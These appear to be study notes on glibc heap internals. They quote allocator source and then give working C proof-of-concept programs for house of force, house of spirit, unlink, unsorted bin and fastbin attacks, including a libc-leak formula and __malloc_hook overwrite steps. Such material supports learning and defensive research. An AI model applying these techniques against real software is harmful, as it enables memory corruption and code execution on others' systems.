Malloc and Heap Exploitation

1. Function execution flow
void * malloc(size_t bytes)
        void *__libc_malloc (size_t bytes)
            __malloc_hook            // called instead of the real allocator when non-NULL
            void * _int_malloc (mstate av, size_t bytes)
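__libc_malloc reads __malloc_hook first and, when it is non-NULL, calls the hook instead of the real allocator; this is why overwriting __malloc_hook is such a common end goal. Abridged from glibc 2.23 (the malloc hooks were removed in glibc 2.34):

    void *
    __libc_malloc (size_t bytes)
    {
      mstate ar_ptr;
      void *victim;

      /* if the hook is set, it completely replaces the allocation path */
      void *(*hook) (size_t, const void *)
        = atomic_forced_read (__malloc_hook);
      if (__builtin_expect (hook != NULL, 0))
        return (*hook) (bytes, RETURN_ADDRESS (0));

      arena_get (ar_ptr, bytes);          /* pick an arena (usually main_arena) */
      victim = _int_malloc (ar_ptr, bytes);
      /* ... retry / unlock logic elided ... */
      return victim;
    }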
2. Analysis of the structures involved
  • malloc_state
/*
		   have_fastchunks indicates that there are probably some fastbin chunks.
		   It is set true on entering a chunk into any fastbin, and cleared early in
		   malloc_consolidate.  The value is approximate since it may be set when there
		   are no fastbin chunks, or it may be clear even if there are fastbin chunks
		   available.  Given it's sole purpose is to reduce number of redundant calls to
		   malloc_consolidate, it does not affect correctness.  As a result we can safely
		   use relaxed atomic accesses.
		 */
		
		struct malloc_state
		{
		  /* Serialize access.  */
		  __libc_lock_define (, mutex);          // offset 0x0 (4 bytes)
		
		  /* Flags (formerly in max_fast).  */
		  int flags;							// offset 0x4
		
		  /* Set if the fastbin chunks contain recently inserted free blocks.  */
		  /* Note this is a bool but not all targets support atomics on booleans.  */
		  int have_fastchunks;  			// offset 0x8
		
		  /* Fastbins */ 
		  mfastbinptr fastbinsY[NFASTBINS];   // fastbin list heads, NFASTBINS = 10 // offset 0x10
		
		  /* Base of the topmost chunk -- not otherwise kept in a bin */
		  mchunkptr top;				// offset 0x60 (96)
		
		  /* The remainder from the most recent split of a small request */
		  mchunkptr last_remainder;
		
		  /* Normal bins packed as described above */
		  mchunkptr bins[NBINS * 2 - 2];                          
		
		  /* Bitmap of bins */
		  unsigned int binmap[BINMAPSIZE];
		
		  /* Linked list */
		  struct malloc_state *next;
		
		  /* Linked list for free arenas.  Access to this field is serialized
		     by free_list_lock in arena.c.  */
		  struct malloc_state *next_free;
		
		  /* Number of threads attached to this arena.  0 if the arena is on
		     the free list.  Access to this field is serialized by
		     free_list_lock in arena.c.  */
		  INTERNAL_SIZE_T attached_threads;
		
		  /* Memory allocated from the system in this arena.  */
		  INTERNAL_SIZE_T system_mem;
		  INTERNAL_SIZE_T max_system_mem;
		};
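The fastbinsY slots are indexed by chunk size. A minimal sketch of the 64-bit indexing (the fastbin_index formula is glibc's; the demo program around it is mine):

    #include <stdio.h>

    /* glibc: ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) */
    #define fastbin_index(sz) ((((unsigned int) (sz)) >> 4) - 2)

    int main (void)
    {
      /* default fastbin range on 64-bit: chunk sizes 0x20 .. 0x80 */
      for (unsigned sz = 0x20; sz <= 0x80; sz += 0x10)
        printf ("chunk size %#x -> fastbinsY[%u]\n", sz, fastbin_index (sz));
      return 0;
    }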
  • malloc_chunk
    /*
    	  This struct declaration is misleading (but accurate and necessary).
    	  It declares a "view" into memory allowing access to necessary
    	  fields at known offsets from a given base. See explanation below.
    	*/
    	
    	Note: malloc(0) still returns a chunk of size 0x20, the minimum chunk size on 64-bit.
    	
    	struct malloc_chunk {
    	
    	  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */ // only meaningful while the previous chunk is free
    	  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */  // total chunk size, flag bits included
    	
    	  struct malloc_chunk* fd;         /* double links -- used only if free. */
    	  struct malloc_chunk* bk;
    	
    	  /* Only used for large blocks: pointer to next larger size.  */
    	  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
    	  struct malloc_chunk* bk_nextsize;
    	};
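Because mchunk_prev_size is only meaningful while the previous chunk is free, an in-use chunk's user data may spill into the next chunk's prev_size field. A small demo of this sharing on 64-bit glibc:

    #include <stdio.h>
    #include <stdlib.h>
    #include <malloc.h>

    int main (void)
    {
      char *a = malloc (0x18);
      char *b = malloc (0x18);
      size_t size_a = ((size_t *) a)[-1];   /* size field sits 8 bytes before the user pointer */

      printf ("chunk size:  %#zx\n", size_a);                 /* 0x21 = 0x20 | PREV_INUSE */
      printf ("usable size: %#zx\n", malloc_usable_size (a)); /* 0x18: borrows b's prev_size */
      printf ("a to b distance: %#tx\n", b - a);              /* 0x20, not 0x30 */
      return 0;
    }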
  • main_arena
    	/* There are several instances of this struct ("arenas") in this
    	   malloc.  If you are adapting this malloc in a way that does NOT use
    	   a static or mmapped malloc_state, you MUST explicitly zero-fill it
    	   before using. This malloc relies on the property that malloc_state
    	   is initialized to all zeroes (as is true of C statics).  */
    	
    	static struct malloc_state main_arena =
    	{
    	  .mutex = _LIBC_LOCK_INITIALIZER,
    	  .next = &main_arena,
    	  .attached_threads = 1
    	};
    
  • malloc_consolidate
/* ------------------------- malloc_consolidate -------------------------
		
		  malloc_consolidate is a specialized version of free() that tears
		  down chunks held in fastbins.  Free itself cannot be used for this
		  purpose since, among other things, it might place chunks back onto
		  fastbins.  So, instead, we need to use a minor variant of the same
		  code.
		*/
		
		static void malloc_consolidate(mstate av)
		{
		  mfastbinptr*    fb;                 /* current fastbin being consolidated */
		  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
		  mchunkptr       p;                  /* current chunk being consolidated */
		  mchunkptr       nextp;              /* next chunk to consolidate */
		  mchunkptr       unsorted_bin;       /* bin header */
		  mchunkptr       first_unsorted;     /* chunk to link to */
		
		  /* These have same use as in free() */
		  mchunkptr       nextchunk;
		  INTERNAL_SIZE_T size;
		  INTERNAL_SIZE_T nextsize;
		  INTERNAL_SIZE_T prevsize;
		  int             nextinuse;
		  mchunkptr       bck;
		  mchunkptr       fwd;
		
		  atomic_store_relaxed (&av->have_fastchunks, false);
		
		  unsorted_bin = unsorted_chunks(av);
		
		  /*
		    Remove each chunk from fast bin and consolidate it, placing it
		    then in unsorted bin. Among other reasons for doing this,
		    placing in unsorted bin avoids needing to calculate actual bins
		    until malloc is sure that chunks aren't immediately going to be
		    reused anyway.
		  */
		
		  maxfb = &fastbin (av, NFASTBINS - 1);
		  fb = &fastbin (av, 0);
		  do {
		    p = atomic_exchange_acq (fb, NULL);
		    if (p != 0) {
		      do {
		        {
		          unsigned int idx = fastbin_index (chunksize (p));
		          if ((&fastbin (av, idx)) != fb)
		            malloc_printerr ("malloc_consolidate(): invalid chunk size");
		        }
		
		        check_inuse_chunk(av, p);
		        nextp = p->fd;
		
		        /* Slightly streamlined version of consolidation code in free() */
		        size = chunksize (p);
		        nextchunk = chunk_at_offset(p, size);
		        nextsize = chunksize(nextchunk);
		
		        if (!prev_inuse(p)) {
		          prevsize = prev_size (p);
		          size += prevsize;
		          p = chunk_at_offset(p, -((long) prevsize));
		          unlink(av, p, bck, fwd);
		        }
		
		        if (nextchunk != av->top) {
		          nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
		
		          if (!nextinuse) {
		            size += nextsize;
		            unlink(av, nextchunk, bck, fwd);
		          } else
		            clear_inuse_bit_at_offset(nextchunk, 0);
		
		          first_unsorted = unsorted_bin->fd;
		          unsorted_bin->fd = p;
		          first_unsorted->bk = p;
		
		          if (!in_smallbin_range (size)) {
		            p->fd_nextsize = NULL;
		            p->bk_nextsize = NULL;
		          }
		
		          set_head(p, size | PREV_INUSE);
		          p->bk = unsorted_bin;
		          p->fd = first_unsorted;
		          set_foot(p, size);
		        }
		
		        else {
		          size += nextsize;
		          set_head(p, size | PREV_INUSE);
		          av->top = p;
		        }
		
		      } while ( (p = nextp) != 0);
		
		    }
		  } while (fb++ != maxfb);
		}
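To watch malloc_consolidate in action, free two adjacent fastbin chunks and then make a large request, which triggers consolidation at the top of _int_malloc. A sketch for pre-tcache glibc (2.23); on 2.26+ run with GLIBC_TUNABLES=glibc.malloc.tcache_count=0 so the frees actually reach the fastbins:

    #include <stdio.h>
    #include <stdlib.h>

    int main (void)
    {
      char *a = malloc (0x28);      /* two adjacent 0x30 fastbin chunks */
      char *b = malloc (0x28);
      void *guard = malloc (0x18);  /* keeps a/b away from the top chunk */
      (void) guard;

      free (a);
      free (b);
      printf ("before consolidate: a's size field = %#zx\n", ((size_t *) a)[-1]); /* 0x31 */

      /* a large request triggers malloc_consolidate(): a and b are merged
         into one 0x60 chunk and moved to the unsorted bin */
      malloc (0x400);
      printf ("after consolidate:  a's size field = %#zx\n", ((size_t *) a)[-1]); /* 0x61 */
      return 0;
    }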
  • free (note: the listing below is actually the free wrapper from glibc's malloc/memusage.c tracing module, not __libc_free itself):
/* `free' replacement.  We keep track of the memory usage if this is the
		   correct program.  */
		void free (void *ptr)
		{
		  struct header *real;
		
		  /* `free (NULL)' has no effect.  */
		  if (ptr == NULL)
		    {
		      ++calls[idx_free];
		      return;
		    }
		
		  /* Determine real implementation if not already happened.  */
		  if (freep == NULL)
		    {
		      me ();
		      freep = (void (*) (void *)) dlsym (RTLD_NEXT, "free");
		    }
		
		  /* If this is not the correct program just use the normal function.  */
		  if (not_me)
		    {
		      (*freep) (ptr);
		      return;
		    }
		
		  /* Determine the pointer to the header.  */
		  real = ((struct header *) ptr) - 1;
		  if (real->magic != MAGIC)
		    {
		      /* This block wasn't allocated here.  */
		      (*freep) (ptr);
		      return;
		    }
		
		  /* Keep track of number of calls.  */
		  ++calls[idx_free];
		  /* Keep track of total memory freed using `free'.  */
		  total[idx_free] += real->length;
		
		  /* Update the allocation data and write out the records if necessary.  */
		  update_data (NULL, 0, real->length);
		
		  /* Do the real work.  */
		  (*freep) (real);
		}
  • unlink
#define unlink(AV, P, BK, FD) {                                            \
		    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
		      malloc_printerr ("corrupted size vs. prev_size");			      \
		    FD = P->fd;								      \
		    BK = P->bk;								      \
		    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
		      malloc_printerr ("corrupted double-linked list");			      \
		    else {								      \
		        FD->bk = BK;							      \
		        BK->fd = FD;							      \
		        if (!in_smallbin_range (chunksize_nomask (P))			      \
		            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
		            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
		                || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
		              malloc_printerr ("corrupted double-linked list (not small)");   \
		            if (FD->fd_nextsize == NULL) {				      \
		                if (P->fd_nextsize == P)				      \
		                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
		                else {							      \
		                    FD->fd_nextsize = P->fd_nextsize;			      \
		                    FD->bk_nextsize = P->bk_nextsize;			      \
		                    P->fd_nextsize->bk_nextsize = FD;			      \
		                    P->bk_nextsize->fd_nextsize = FD;			      \
		                  }							      \
		              } else {							      \
		                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
		                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
		              }								      \
		          }								      \
		      }									      \
		}

  • malloc(0) allocates a 0x20-byte chunk.
fastbin          0x20 – 0x80     (the next chunk's prev_inuse bit stays 1)
smallbin         0x20 – 0x3f0
unsortedbin      not sorted by size
largebin         >= 0x400

fd_nextsize / bk_nextsize are only used for chunks of at least 0x400 (large bins).
main_arena: the single structure that manages all of the bin lists.
fd: forward link; bk: backward link (clockwise vs. counter-clockwise around the circular list).
3. Summary:
1. Chunk allocation is driven by main_arena: the fastbins are searched first, then the other bins.
2. On 64-bit, chunk sizes must be 16-byte aligned (2 * SIZE_SZ); on 32-bit, 8-byte aligned (2 * SIZE_SZ).
3. The prev_size field can be shared: a 0x18-byte request reuses the next chunk's prev_size field as user data.
4. The core idea of heap exploitation: still being able to modify a chunk after it has been freed.
5. Once a chunk is freed into the unsorted bin, it holds libc addresses: libc.address = leaked_ptr - libc.symbols["main_arena"] - 88 (88 on glibc 2.23; 96 on 2.26+, where have_fastchunks was added). See the sketch after this list.
6. For a fastbin chunk, the next chunk's prev_size stays 0 and its prev_inuse bit stays 1.
7. malloc_consolidate walks the fastbins, merges whatever can be merged, and puts the results into the unsorted bin. At the end of the unsorted-bin scan inside malloc, leftover unsorted chunks are sorted into their proper bins.
8. To find a marker such as 0xdeadbeef in gdb (pwndbg/gef), use: search -4 0xdeadbeef
9. When the top chunk can no longer satisfy a request, malloc grows the heap with the brk/sbrk (or mmap) system call to build a new top chunk, and the old, too-small top chunk is freed into the unsorted bin. This is the basis of HOUSE OF ORANGE.
10. When a fastbin chunk can satisfy the request, the next malloc never touches the unsorted bin.
11. As soon as any chunk lands in a bin other than a fastbin, it contains libc addresses.
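A sketch of the leak from point 5: free a chunk into the unsorted bin and read the main_arena pointer out of its fd. The 0x420 request keeps the chunk out of the fastbins and, on glibc 2.26+, out of tcache:

    #include <stdio.h>
    #include <stdlib.h>

    int main (void)
    {
      char *p = malloc (0x420);
      void *guard = malloc (0x18);   /* keeps p from merging back into top */
      (void) guard;

      free (p);                      /* p goes to the unsorted bin */
      /* fd now points at the unsorted bin head inside main_arena
         (main_arena + 88 on glibc 2.23, + 96 on 2.26+) */
      printf ("leaked main_arena pointer: %p\n", *(void **) p);
      return 0;
    }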



Write primitives behind the bin attacks (victim = the chunk being inserted/removed, fwd = a corrupted chunk already sitting in the large bin):

large bin attack, write 1: corrupt fwd->bk = target - 0x10; insertion then runs
    bck = fwd->bk;  ...  bck->fd = victim;              // *(target) = victim

large bin attack, write 2: corrupt fwd->bk_nextsize = target - 0x20; insertion then runs
    victim->bk_nextsize = fwd->bk_nextsize;             // = target - 0x20
    victim->bk_nextsize->fd_nextsize = victim;          // *(target) = victim

unsorted bin attack: corrupt victim->bk = target - 0x10; removal then runs
    bck = victim->bk;  bck->fd = unsorted_chunks (av);  // *(target) = unsorted_chunks (av)
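The unsorted bin attack primitive above as a self-contained sketch. It works up to glibc 2.27; 2.28 added a bck->fd integrity check that aborts instead. The global target is a stand-in for whatever address you actually want to corrupt:

    #include <stdio.h>
    #include <stdlib.h>

    unsigned long target = 0;         /* stand-in for the real corruption target */

    int main (void)
    {
      char *victim = malloc (0x420);  /* big enough to skip fastbins/tcache */
      void *guard = malloc (0x18);
      (void) guard;

      free (victim);                  /* victim -> unsorted bin */
      /* simulate the vulnerability: overwrite victim's bk */
      ((void **) victim)[1] = (void *) ((char *) &target - 0x10);

      /* taking victim off the list performs bck->fd = unsorted_chunks (av) */
      malloc (0x420);
      printf ("target is now %#lx (an address inside main_arena)\n", target);
      return 0;
    }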

  • bins structure
    1. unsorted bin: chunks are not sorted by size.
    2. bins 2 through 63 are the small bins; every chunk in a given small bin has the same size, and adjacent bins differ by two machine words (0x10 on 64-bit).
    fastbin
    1. malloc_init_state calls set_max_fast (DEFAULT_MXFAST) to set the maximum fastbin chunk size.
    2. LIFO: the most recently freed chunk is handed out first, traversing from main_arena.
    3. The chunk's inuse bit always stays 1.
    4. Singly linked list.
    small bin
    1. 62 bins in total; every chunk in a list has the same size: size = 2 * SIZE_SZ * index (0x20 – 0x3f0 on 64-bit).
    2. FIFO.
    3. The prev_inuse bit is 0 when the previous chunk has been freed.
    unsorted bin
    1. A single doubly linked list: freed chunks that are not fastbin-sized land here first, before malloc sorts them into the small or large bins.
Heap exploitation techniques
1. house of force
   1. Corrupt the top chunk's size field (via a heap overflow or otherwise) to a huge value; you can then make malloc serve a request of almost any size from top and steer exactly where the next allocation lands. See the sketch below.
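A minimal house-of-force sketch, assuming glibc < 2.29 (2.29 started validating the top chunk size against system_mem); secret is a hypothetical target in .data, below the heap, so the request size wraps around:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* hypothetical target; lives in .data, below the heap */
    static char secret[0x20] __attribute__ ((aligned (16))) = "protect me";

    int main (void)
    {
      char *p = malloc (0x18);                  /* chunk of size 0x20 */
      size_t *top_size = (size_t *) (p + 0x18); /* top chunk's size field */
      *top_size = (size_t) -1;                  /* simulate the overflow */

      /* request a size that wraps around so the new top lands at secret - 0x10 */
      char *top = p + 0x10;                     /* top chunk header */
      size_t evil = (size_t) secret - 0x10 - (size_t) top - 8;
      malloc (evil);

      char *q = malloc (0x18);                  /* q == secret */
      strcpy (q, "owned");
      printf ("secret @ %p, q @ %p: %s\n", (void *) secret, (void *) q, secret);
      return 0;
    }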

2. house of spirit
   1. Use free on a forged chunk so that a later malloc hands back a pointer of your choosing, turning into an arbitrary write.
   * Requirements:
     You can forge a chunk near the target.
     You can perform one free on the forged chunk.
     After the free you can malloc the chunk back and overwrite the target's contents.
     A sketch follows below.
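A house-of-spirit sketch against a fake fastbin-sized chunk on the stack, modelled on the classic how2heap demo. The comments note the glibc 2.23-era free() checks; with tcache (2.26+) the checks are even weaker:

    #include <stdio.h>
    #include <stdlib.h>

    int main (void)
    {
      /* fake chunk + room for the "next chunk" header, 16-byte aligned */
      unsigned long fake[16] __attribute__ ((aligned (16)));

      fake[1] = 0x40;      /* fake size: a valid fastbin size, flag bits clear */
      fake[9] = 0x1234;    /* fake next-chunk size: must be > 2*SIZE_SZ and
                              < av->system_mem to pass the free() checks */

      malloc (1);          /* make sure the heap/arena is initialised */
      free (&fake[2]);     /* the fake chunk enters the 0x40 fastbin */

      void *q = malloc (0x38);   /* handed straight back to us */
      printf ("fake chunk user ptr %p, malloc returned %p\n",
              (void *) &fake[2], q);
      return 0;
    }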

3. unlink exploitation
   1. With a global pointer q that points at the chunk, forge fd = &q - 0x18 and bk = &q - 0x10 inside it; unlink then performs
      *q = &q - 0x10   (FD->bk = BK)
      *q = &q - 0x18   (BK->fd = FD, the value that sticks)
      so q ends up pointing 0x18 bytes before its own address. See the sketch below.
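A sketch of the modern unlink attack, modelled on how2heap's unsafe_unlink: a global pointer chunk0_ptr points at the overflowed chunk, and the forged fd/bk make the FD->bk == P && BK->fd == P check pass. Shown for pre-tcache glibc; on 2.26+ either disable tcache or use chunk sizes above 0x408:

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>

    uint64_t *chunk0_ptr;   /* global pointer to the victim chunk */

    int main (void)
    {
      chunk0_ptr = malloc (0x80);              /* chunk 0 */
      uint64_t *chunk1 = malloc (0x80);        /* chunk 1, physically adjacent */

      /* fake chunk inside chunk 0, passing FD->bk == P && BK->fd == P */
      chunk0_ptr[0] = 0;                              /* fake prev_size */
      chunk0_ptr[1] = 0x80;                           /* fake size */
      chunk0_ptr[2] = (uint64_t) &chunk0_ptr - 0x18;  /* fd */
      chunk0_ptr[3] = (uint64_t) &chunk0_ptr - 0x10;  /* bk */

      /* simulate the overflow into chunk 1's header */
      uint64_t *hdr1 = (uint64_t *) ((char *) chunk1 - 0x10);
      hdr1[0] = 0x80;          /* prev_size: distance back to the fake chunk */
      hdr1[1] &= ~1;           /* clear prev_inuse */

      free (chunk1);           /* backward consolidation unlinks the fake chunk:
                                  chunk0_ptr = &chunk0_ptr - 0x18 */
      printf ("chunk0_ptr = %p, &chunk0_ptr = %p\n",
              (void *) chunk0_ptr, (void *) &chunk0_ptr);
      return 0;
    }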
4. fastbin_attack
	1. The fake chunk's size field must pass the fastbin index check in _int_malloc ("malloc(): memory corruption (fast)"): for the 0x70 fastbin, sizes 0x78–0x7f all map to the right index, so a stray 0x7f byte works.
	2. The classic fake-chunk location is __malloc_hook - 0x23, where such a 0x7f byte supplies the size. A sketch of the underlying fastbin dup follows.
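The fastbin attack builds on a fastbin dup. A sketch for glibc 2.23 (on 2.26+ tcache absorbs these frees first, so fill or disable it); the actual fd overwrite is left as a comment because the fake-chunk address is target-specific:

    #include <stdio.h>
    #include <stdlib.h>

    int main (void)
    {
      void *a = malloc (0x68);
      void *b = malloc (0x68);

      free (a);
      /* freeing a again right now would abort: the double-free check
         only compares against the current list head */
      free (b);        /* fastbin 0x70: b -> a */
      free (a);        /* fastbin 0x70: a -> b -> a */

      void *c = malloc (0x68);   /* returns a, but a is still linked via b */
      /* here the attack would overwrite a->fd with a fake chunk address
         whose size field looks like 0x7f, e.g. near __malloc_hook - 0x23: */
      /* *(void **) c = fake_chunk_addr;   (hypothetical, target-specific) */

      malloc (0x68);   /* returns b */
      malloc (0x68);   /* returns a again */
      /* the next malloc (0x68) would return fake_chunk_addr + 0x10 */
      printf ("a = %p, c = %p (same chunk handed out twice)\n", a, c);
      return 0;
    }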
	
5. unsorted bin attack
	1. Overwrite the bk of a chunk sitting in the unsorted bin with target - 0x10; the next malloc that takes the chunk off the list then writes the address of unsorted_chunks (av), a main_arena address, into *target (see the write-primitive notes and sketch above).
6. unsorted bin attack + fastbin_attack
	1. malloc a 0x70 fastbin-sized chunk
	2. free it into the 0x70 fastbin
	3. overwrite its fd -> target
	4. malloc a 0x100 chunk
	5. free it into the unsorted bin
	6. overwrite the freed 0x100 chunk's bk (at chunk address + 0x8) -> target
	7. malloc 0x100 (triggers the unsorted bin write)
	8. malloc 0x70
	9. malloc 0x70, obtaining the target chunk

Note: chunks moving from the unsorted bin into a small bin are inserted at the list head without an unlink, so no fd/bk integrity check runs on that path.

